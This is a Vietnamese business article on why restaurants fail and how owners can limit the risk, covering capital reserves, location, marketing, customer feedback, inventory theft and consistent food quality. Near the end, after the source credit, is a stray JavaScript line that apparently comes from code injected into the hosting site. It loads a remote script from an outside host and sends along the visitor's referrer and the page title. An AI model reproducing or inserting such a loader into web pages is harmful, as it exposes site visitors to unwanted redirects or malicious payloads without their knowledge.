Làm thế nào để hạn chế tối đa thất bại trong kinh doanh nhà hàng?

Thiết lập mục tiêu thực tế và phân tích thị trường sẽ giúp bạn lựa chọn một khái niệm nhà hàng tốt, làm cho các quyết định kinh doanh tốt và ngăn chặn việc thất bại của các nhà hàng.

Nếu bạn biết những lý do phổ biến nhất khiến các nhà hàng thất bại, bạn sẽ có thể nhận các tín hiệu xấu và chú ý về thời gian, làm cho một quyết định đúng đắn và hy vọng không phải đối mặt với những thất bại.

Làm thế nào để một doanh nghiệp sống sót trong năm đầu tiên kinh doanh?

image001

Nếu bạn mới chỉ bắt đầu kinh doanh nhà hàng vài năm, bạn chắc chắn sẽ phải gặp rất nhiều vấn đề, nhưng bạn vẫn phải ở đó để điều hành nó phải không? Thực tế là các nhà hàng thất bại với một tốc độ đáng báo động, lên tới 90 đến 95% trong năm đầu tiên, thực sự là sai. Theo các nghiên cứu gần đây được thực hiện bởi Giáo sư Tiến sĩ HG Parsa trong vòng 3 năm qua, có khoảng 60% nhà hàng thất bại. Trong năm đầu tiên, mức cao nhất là 26%, 19% trong năm thứ hai và 14% trong năm thứ ba của kinh doanh nhà hàng. Theo ông, tỷ lệ thất bại nhà hàng từ 90% có thể không được xác nhận.

Những lý do chính cho sự thất bại của nhà hàng:

  • Vốn khởi đầu thấp;
  • Nền tảng kiến thức yếu kém;
  • Chọn sai địa điểm;
  • Kế hoạch xúc tiến nhà hàng nghèo nàn;
  • Phục vụ không nhất quán;
  • Các quan hệ đối tác không hiệu quả;
  • Quản lý nhân viên & hàng tồn kho kém;
  • Không có những ý tưởng khởi nghiệp ban đầu.

Tùy thuộc vào loại nhà hàng nhưng nếu bạn muốn sở hữu một nhà hàng thì bạn cần có ít nhất $30,000. Tôi đã nói chuyện với rất nhiều chủ nhà hàng và họ thường bị rơi vào những cạm bẫy này. Họ mở một nhà hàng trên số nợ của ngân hàng nhưng không có đủ khả năng để hoàn trả lại số tiền đó.

Một lời khuyên: Đừng vội vàng mua những thiết bị hay nội thất mới trước khi bạn nghĩ đến lợi ích và sự cần thiết nó mang lại. Tôi cần phải nhấn mạnh đến số tiền bạn phải tích trữ trong vòng 12 – 16 tháng đầu tiên để đảm bảo rằng bạn có đủ vốn cho tất cả các vấn đề có thể phát sinh bất cứ lúc nào. Điều này là rất quan trọng bởi vì trong những năm đầu tiên bạn chưa thể dự đoán chính xác quá trình biến động tài chính cho nhà hàng của mình.

Đặc biệt chú ý đến các khoản đầu tư tài chính:

  • Chủ sở hữu nhà hàng mới mở thường chọn một địa điểm quá đắt đối với ngân sách của họ và đặt mình lên vào những thất bại đầu tiên;
  • Thiếu kinh phí hoạt động ban đầu làm bạn không đủ khả năng để điều hành nhà hàng “sống” đến khi nó bắt đầu làm ăn có lãi;
  • Bỏ qua việc kiểm soát các phần thực phẩm và chất lượng thức uống, chú ý đến chi phí mua hàng.

Tại sao các nhà hàng nhượng quyền thương mại dễ thành công hơn các nhà hàng độc lập?

image003

Nếu bạn nhìn kỹ, bạn sẽ hiểu rằng chủ sở hữu các nhà hàng nhượng quyền thương mại đầu tư nhiều hơn trong việc nghiên cứu thị trường, tìm kiếm vị trí và chọn khái niệm nhà hàng đúng. Ngoài ra họ có thể dựa vào số năm kinh nghiệm hoặc những sai lầm tại các cơ sở khác trong dây chuyền. Kết quả là, các nhà hàng nhượng quyền thương mại có thể dễ dàng có đươc thành công hơn.

Vị trí cho nhà hàng của bạn

image005

Vị trí thể hiện khả năng nghiên cứu thị trường của bạn đến đâu. Nó phụ thuộc vào khách hàng tiềm năng của bạn là ai và nhu cầu và khả năng mua hàng của họ như thế nào.

Vị trí cũng có thể ảnh hưởng đến thực đơn nhà hàng của bạn ngoài các yếu tố bên ngoài như thiết kế, giao thông, khả năng tiếp cận & hiển thị, nơi để xe,…

Đấy là những điều bạn cũng nên xem xét khi lựa chọn vị trí nhà hàng. Tất nhiên, mỗi nhà hàng khác nhau sẽ yêu cầu những địa điểm khác nhau. Ví dụ, nếu các thương hiệu thời trang, bạn có thể chọn một nơi ở trung tâm thành phố, có nhiều người qua lại nhưng nếu bạn là một nhà hàng ăn uống lãng mạn, bạn nên chọn một vị trí yên tĩnh hơn.

Không thành công nào đến mà không cần có một chiến lược xúc tiến thích hợp

image007

Rất nhiều nhà hàng hiện nay chỉ đơn giản là trông chờ vào hình thức quảng cáo qua lời nói mỗi ngày. Nhưng thật không may cho họ, thông tin qua mỗi người chắc chắn sẽ không còn giống nhau và cách mà họ nói chuyện chắc chắn bạn cũng chẳng thế nào kiểm soát cho nổi.

Hãy chắc chắn tạo ra một kế hoạch marketing cho nhà hàng của bạn và sẵn sàng một ngân sách cho quảng cáo.

Bạn cần hiểu khách hàng của mình

image008

Mục đích chính của việc kinh doanh là tạo ra lợi nhuận nhưng những lợi nhuận đó đến từ khách hàng của bạn, bởi vậy, nguyên nhân sâu xa là làm cho khách hàng cảm thấy hài lòng. Hiểu khách hàng nghĩa là nhận biết được khách hàng đang muốn gì, giải quyết nhanh chóng vấn đề của họ trước khi họ kịp phàn nàn với bạn. Bạn cần nắm rõ cơ sở khách hàng đặc biệt là thông tin của những khách hàng thân thiết, tìm cách liên hệ với họ.

Cải thiện hiệu quả kinh doanh của bạn bằng cách lắng nghe khách hàng và cung cấp cho họ cơ hội đánh giá dịch vụ thực phẩm. Hỏi khách hàng của bạn những gì họ nghĩ và họ thấy những gì bạn đã làm như là một kết quả phản hồi. Bạn không bao giờ có thể khám phá ra nơi bạn đang đi sai, trừ khi bạn chủ động tham khảo ý kiến ​​khách hàng.

Hàng tồn kho và kiểm soát viên

image010

Phân tích lợi nhuận và kiểm soát hàng tồn kho là một nhiệm vụ quan trọng của mỗi người quản lý hoặc chủ sở hữu  nhà hàng và quầy bar, mà phải được tiến hành thường xuyên để ngăn chặn hành vi trộm cắp và giảm chi phí không cần thiết.

Nó đã được chứng minh rằng trung bình hàng tháng doanh nghiệp mất khoảng 20% ​​doanh thu do vấn đề trộm cắp, đồ uống miễn phí, đổi đồ uống và các chi phí khác. Điều này có nghĩa rằng bạn bị mất một khoản tiền cỡ $4000- $10.000 mỗi tháng, thậm chí bạn còn chẳng biết về sự hiện diện của nó.

Đặc biệt chú ý khi tạo danh sách các thành phần cho các mặt hàng tồn kho. Điều quan trọng là bạn xác định chính xác số tiền được yêu cầu để chuẩn bị các món ăn trước khi chế biến.

Chất lượng thực phẩm & dịch vụ thay đổi

image012

Nếu khách hàng nhận ra thực phẩm và dịch vụ tốt thì đó chắc chắn là lý do họ nên quay trở lại nhà hàng của bạn. Nhưng thực phẩm tốt không mang lại cơ hội lớn và bền vững để giữ chân khách hàng. Nó bị ảnh hưởng bởi tính cạnh tranh gay gắt trên thị trường kinh doanh nhà hàng. Hãy chắc chắn rằng chất lượng của thực phẩm và dịch vụ tại nhà hàng của bạn đang ở mức cao và quan trọng là giữ nó ổn định liên tục. Những cách nấu ăn/món ăn đã được khách hàng chấp nhận thì không nên bị thay đổi.

Điều này không có nghĩa là bạn cứ mãi giữ nguyên nó bởi khách hàng quay trở lại cũng vì sợ háo hức cho những điều gì đó mới mẻ họ nhận được khi đến nhà hàng của bạn.

Chủ nhà hàng mới thường không chủ động trong hoạt động kinh doanh của mình, có thể là do thiếu thốn kinh nghiệm hoặc sự cạnh tranh quá lớn. Đã đến lúc bạn nên làm quen dần với những lý do tại sao một nhà hàng có thể dễ dàng thất bại trong những năm đầu tiên và tìm ra cách hạn chế ảnh hưởng của chúng. Công việc trước mắt bạn cần làm là chuẩn bị vốn, nghiên cứu thị trường kỹ lưỡng để tìm được lợi điểm kinh doanh phù hợp, độc nhất.

Nhưng vẫn còn thiếu rằng nếu bạn không thử, bạn sẽ chẳng bao giờ biết gì cả….

(Theo Possector)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận

Trang 1 trên 11